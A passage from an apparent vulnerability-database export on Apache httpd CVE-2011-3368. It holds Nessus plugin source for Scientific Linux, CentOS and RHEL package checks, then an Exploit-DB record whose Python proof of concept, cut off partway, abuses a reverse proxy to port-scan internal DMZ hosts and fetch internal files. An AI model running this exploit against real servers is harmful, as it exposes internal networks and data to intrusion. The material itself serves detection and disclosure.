possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update\n introduced regressions in the way httpd handled certain\n Range HTTP header values. This update corrects those\n regressions.\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.", "edition": 23, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : httpd on SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2021-01-02T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111020_HTTPD_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61160", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61160);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:20\");\n\n script_cve_id(\"CVE-2011-3368\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update\n introduced regressions in the way httpd handled certain\n Range HTTP header values. This update corrects those\n regressions.\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1110&L=scientific-linux-errata&T=0&P=2404\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8660505\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"httpd-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-debuginfo-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-devel-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-manual-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-suexec-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"mod_ssl-2.0.52-49.sl4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-53.sl5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:27:18", "description": "Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.", "edition": 26, "published": "2011-10-21T00:00:00", "title": "CentOS 4 / 5 : httpd (CESA-2011:1392)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2011-10-21T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd-suexec", "p-cpe:/a:centos:centos:mod_ssl", "p-cpe:/a:centos:centos:httpd-manual", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/56570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1392 and \n# CentOS Errata and Security Advisory 2011:1392 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56570);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"CentOS 4 / 5 : httpd (CESA-2011:1392)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55083c8a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0cbcfc97\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1569ea8b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018126.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f65d4a6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-49.ent.centos4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-devel-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-manual-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mod_ssl-2.2.3-53.el5.centos.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T04:59:53", "description": "Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.", "edition": 27, "published": "2011-10-21T00:00:00", "title": "RHEL 4 / 5 : httpd (RHSA-2011:1392)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:httpd-suexec", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-devel"], "id": "REDHAT-RHSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/56579", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1392. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56579);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2019/10/25 13:36:16\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"RHEL 4 / 5 : httpd (RHSA-2011:1392)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3368\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1392\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1392\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-devel-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-manual-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-suexec-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_ssl-2.0.52-49.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-02T08:55:50", "description": "Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC. CVE-2011-3368. Remote exploits for multiple platform", "published": "2011-10-11T00:00:00", "type": "exploitdb", "title": "Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-11T00:00:00", "id": "EDB-ID:17969", "href": "https://www.exploit-db.com/exploits/17969/", "sourceData": "#!/usr/bin/env python\r\n\r\nimport socket\r\nimport string\r\nimport getopt, sys\r\n\r\n\r\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\r\n\r\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\r\n\r\n\tget = \"GET \" + url + \"@\" + internal_target + \":\" + internal_port + \"/\" + resource + \" HTTP/1.1\\r\\n\"\r\n\tget = get + \"Host: \" + apache_target + \"\\r\\n\\r\\n\"\r\n\t\r\n\tremoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tremoteserver.settimeout(3)\r\n\r\n\ttry:\r\n\t\tremoteserver.connect((apache_target, int(apache_port)))\r\n\t\tremoteserver.send(get)\r\n\t\treturn remoteserver.recv(4096)\r\n\texcept:\r\n\t\treturn \"\"\r\n\r\ndef get_banner(result):\r\n\treturn result[string.find(result, \"\\r\\n\\r\\n\")+4:]\r\n\r\n\r\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n\r\n\tprint_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n\tfor port in tested_ports:\r\n\t\tport = str(port)\r\n\t\tresult = send_request(url, apache_target, apache_port, internal_target, port, resource)\r\n\t\tif string.find(result,\"HTTP/1.1 200\")!=-1 or \\\r\n\t\tstring.find(result,\"HTTP/1.1 30\")!=-1 or \\\r\n\t\tstring.find(result,\"HTTP/1.1 502\")!=-1:\r\n\t\t\tprint \"- Open port: \" + port + \"/TCP\"\r\n\t\t\tprint get_banner(result)\r\n\t\telif len(result)==0:\r\n\t \t\tprint \"- Filtered port: \" + port + \"/TCP\"\r\n\t\telse:\r\n\t \t\tprint \"- Closed port: \" + port + \"/TCP\"\r\n\t\t\t\r\n\r\ndef usage():\r\n\tprint\r\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\r\n\tprint \"http://www.secforce.co.uk\"\r\n\tprint\r\n\tprint \"usage():\"\r\n\tprint \"python apache_scan.py [options]\"\r\n\tprint\r\n\tprint \" [options]\"\r\n\tprint \"\t\t-r: Remote Apache host\"\r\n\tprint \"\t\t-p: Remote Apache port (default is 80)\"\r\n\tprint \"\t\t-u: URL on the remote web server (default is /)\"\r\n\tprint \"\t\t-d: Host in the DMZ (default is 127.0.0.1)\"\r\n\tprint \"\t\t-e: Port in the DMZ (enables 'single port scan')\"\r\n\tprint \"\t\t-g: GET request to the host in the DMZ (default is /)\"\r\n\tprint \"\t\t-h: Help page\"\r\n\tprint\r\n\tprint \"examples:\"\r\n\tprint \" - Port scan of the remote host\"\r\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif\"\r\n\tprint \" - Port scan of a host in the DMZ\"\r\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local\"\r\n\tprint \" - Retrieve a resource from a host in the DMZ\"\r\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html\"\r\n\tprint\r\n\r\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n\tprint\r\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\r\n\tprint \"http://www.secforce.co.uk\"\r\n\tprint\r\n\tprint \" [+] Target: \" + apache_target\r\n\tprint \" [+] Target port: \" + apache_port\r\n\tprint \" [+] Internal host: \" + internal_target\r\n\tprint \" [+] Tested ports: \" + str(tested_ports)\r\n\tprint \" [+] Internal resource: \" + resource\r\n\tprint\r\n\r\n\r\ndef main():\r\n\r\n\tglobal apache_target\r\n\tglobal apache_port\r\n\tglobal url\r\n\tglobal internal_target\r\n\tglobal internal_port\r\n\tglobal resource\r\n\r\n\ttry:\r\n\t\topts, args = getopt.getopt(sys.argv[1:], \"u:r:p:d:e:g:h\", [\"help\"])\r\n\texcept 